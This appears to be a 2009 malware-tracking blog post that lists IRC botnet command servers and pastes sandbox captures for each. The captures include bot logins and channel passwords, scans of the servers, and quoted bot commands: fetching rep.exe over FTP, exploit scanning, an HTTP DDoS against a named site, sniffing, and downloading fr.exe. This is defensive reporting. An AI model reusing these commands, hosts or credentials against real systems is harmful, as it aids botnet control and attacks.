Month: May 2009

ladroes.hopto.org

Resolved : [ladroes.hopto.org] To [114.143.225.10]PASS systemNICK n-348385USER lehapaoz 0 0 :n-348385USERHOST n-348385MODE n-348385 -x+BJOIN #win systemNOTICE n-348385 :.VERSION mIRC v6.12 Khaled Mardam-Bey.PRIVMSG #win :[MAIN]: Status: Ready. Bot Uptime: 0d 0h 0m.PRIVMSG #win :[MAIN]: Bot ID: systemBot.PRIVMSG #win :[Scn]: Exploit Statistics: NetBios: 0, NTPass: 0, Dcom135: 0, Dcom1025: 0, Dcom2: 0, MSSQL: 0, lsass: 0, Total:

94.102.55.189(NL hosting)

The following Host Name was requested from a host database:94.102.55.189 There was a new connection established with a remote IRC Server. The generated outbound IRC traffic is provided below:NICK [00|USA|843633]USER XP-0033 * 0 :COMPUTERNAMEMODE [00|USA|843633] -ixJOIN #HowieTeS# KillerZ2009 litle scan :Interesting ports on 94.102.55.189:Not shown: 1669 closed portsPORT STATE SERVICE VERSION21/tcp open ftp?22/tcp open ssh

dddd.burimche.net

– DNS Queries: Name Query Type Query Result Successful Protocol dddd.burimche.net DNS_TYPE_A 67.215.1.226 1 – IRC Conversations: 67.215.1.226:4244 Nick: [00|USA|868283]Username: XP-8912Server Pass: letmeinJoined Channel: ##bb## with Password boleChannel Topic for Channel ##bb##: “P http://www-facebooks.com/images.php?=”Private Message to Channel ##bb##: “msn// Thread Activated: Sending Message.”Private Message to Channel ##bb##: “msn// Thread Disabled.”

mm1.luckybusy.com(MATRIXIRCD)

Remote Host Port Numbermm1.luckybusy.com 7001 he following Internet Connection was established:Server Name Server Port Connect as User Connection Passwordwww.letmeknowwhenyou.org 80 (null) (null) The following GET request was made:counter/20080727a/counter.php There was a new connection established with a remote IRC Server. The generated outbound IRC traffic is provided below: NICK IM1263Q496068USER hzrxuror 0 0 :IM1263Q496068HGDTUH IM1263Q496068MODE IM1263Q496068

usb.ma7d.com

Remote Host Port Numberusb.ma7d.com 1863 PASS lamNICK cmfzfdUSER kwghli “” “nii” :kwghliResolved : [usb.ma7d.com] To [66.252.5.61] some interessing ports for h4x0rs on this machine 5800/tcp open vnc-http?5801/tcp open vnc-http-1?5802/tcp open vnc-http-2?5803/tcp open vnc-http-3?5900/tcp open vnc?5901/tcp open vnc-1?5902/tcp open vnc-2?5903/tcp open vnc-3?5977/tcp open ncd-pref-tcp?5978/tcp open ncd-diag-tcp?5979/tcp open ncd-conf-tcp?5997/tcp open ncd-pref?5998/tcp open ncd-diag?5999/tcp open ncd-conf?6000/tcp open X11?6001/tcp

irc.kkk.com(ni from #bottalk lame net)

– IRC Conversations: 117.121.240.14:17901Nick: [N00|USA|353397]Username: XP-9448Server Pass: letmeinJoined Channel: #wut with Password openChannel Topic for Channel #USA: “.asc -S|.sftp 65.60.55.158 21 nn1zalf zalf rep.exe|.advscan exp_usa 20 3 0 -b -r -e|.advscan exp_xxx 7 3 0 -b -r -e”Channel Topic for Channel #wut: “.asc -S|.sftp 65.60.55.158 21 nn1zalf zalf rep.exe|.advscan exp_xxx 20 3 0 -b -r

alb.th3kings.net

Remote Host Port Numberalb.th3kings.net 3333 NICK [00|USA|198358]USER XP-0525 * 0 :COMPUTERNAME Resolved : [alb.th3kings.net] To [203.154.27.138]Resolved : [alb.th3kings.net] To [211.192.70.238]Resolved : [alb.th3kings.net] To [59.120.56.243]

next.hi5photos.mobi

Resolved : [next.hi5photos.mobi] To [86.55.5.122]Resolved : [next.hi5photos.mobi] To [216.38.54.228] Remote Host Port Numbernext.hi5photos.mobi 4244Server Name Server Port Connect as User Connection Passwordwww.facebook.com 80 (null) (null) The following GET requests were made:index.htmlindex.jpg NICK [00|USA|306350]USER XP-7944 * 0 :COMPUTERNAME Interesting ports on vps.selimiserverz.net (216.38.54.228):Not shown: 1660 closed portsPORT STATE SERVICE VERSION1/tcp open tcpwrapped21/tcp open ftp PureFTPd25/tcp open

chat-shqip.org(JiMiGj from #bottalk lamer net)

– DNS Queries:chat-shqip.orgwww.dardania.de www.hasi4ever.com – HTTP Conversations:72.20.33.221:80 – [www.dardania.de]85.192.32.204:80 – [www.hasi4ever.com:80] Request: GET /fr.exe Response: 200 “OK” – IRC Conversations:66.54.153.162:13001 Nick: `mcauxbUsername: `mcauxbJoined Channel: #.rJoined Channel: #.has with Password hsChannel Topic for Channel #.has: “`i.join #.r |`sniff.on -s”Private Message to Channel #.has: “`set jimi jimi -s”Private Message to Channel #.has: “`ddos.http http://www.dardania.de 500 3 4

infer.infernoslair.com

– DNS Queries:infer.infernoslair.com– IRC Conversations: From ANUBIS:1034 to 67.43.236.106:1863Nick: QNAWaTVSUsername: bipcjuJoined Channel: ##trophyChannel Topic for Channel ##trophy: “=92CQY7ETbn+YEhznR7ZdYkdu7z34oiLpXxzS”